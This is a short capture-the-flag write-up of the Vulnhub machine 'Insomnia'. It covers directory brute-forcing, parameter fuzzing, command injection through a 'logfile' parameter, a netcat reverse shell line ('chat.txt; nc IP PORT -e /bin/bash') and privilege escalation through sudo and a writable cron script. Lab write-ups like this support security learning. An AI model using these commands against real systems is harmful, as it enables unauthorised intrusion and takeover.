Insomnia Vulnhub Writeup (First blood)

3 min readMar 6, 2021

Difficulty: Easy/Medium (In my opinion)

NMAP:

Nice port 8080 is open, so let’s browse

as we can see there is a chat, but we can’t do anything so, we use dirb to brute-force directories

DIRB:

Ok we found the directory “administration.php” and other but there are rabbit hole , let’s browse this directory

Nice “Your activity has been logged”, but we can do nothing here, so let’s fuzz some parameter

ARJUN:

We found the parameter “logfile” so , we can do an LFI? mmmh No! Doesn’t work, but we can do command injection, and the result will appear directly in the chat!

COMMAND INJECTION:

And

Will appear some files! Nice , we notice that “chat.txt” can execute commands so

And

Wow! www-data so , let’s go for the reverse shell!

Command: chat.txt; nc IP PORT -e /bin/bash and listen first!

HORIZONTAL PRIVILEGE ESCALATION:

sudo -l

Nice that “start.sh” had user “julia” privilege, so add /bin/bash in that script

Nice!!!

VERTICAL PRIVILEGE ESCALATION:

Initially we do not notice anything interesting but, if we try to see in / etc / crontab we notice a file running on the system and running, so we can exploit it.

For convenience it uses pspy64 which shows me the files that are running on the system. To understand how often it is performed.

Now put pspy64 on target shell in /tmp directory and give privilege “chmod +x pspy64 and run it ./pspy64

And run now!

as we can see every 1 minutes, we run the “check.sh” script so we also notice that it is an editable file! Then let’s add our payload for the reverse shell.

Press enter or click to view image in full size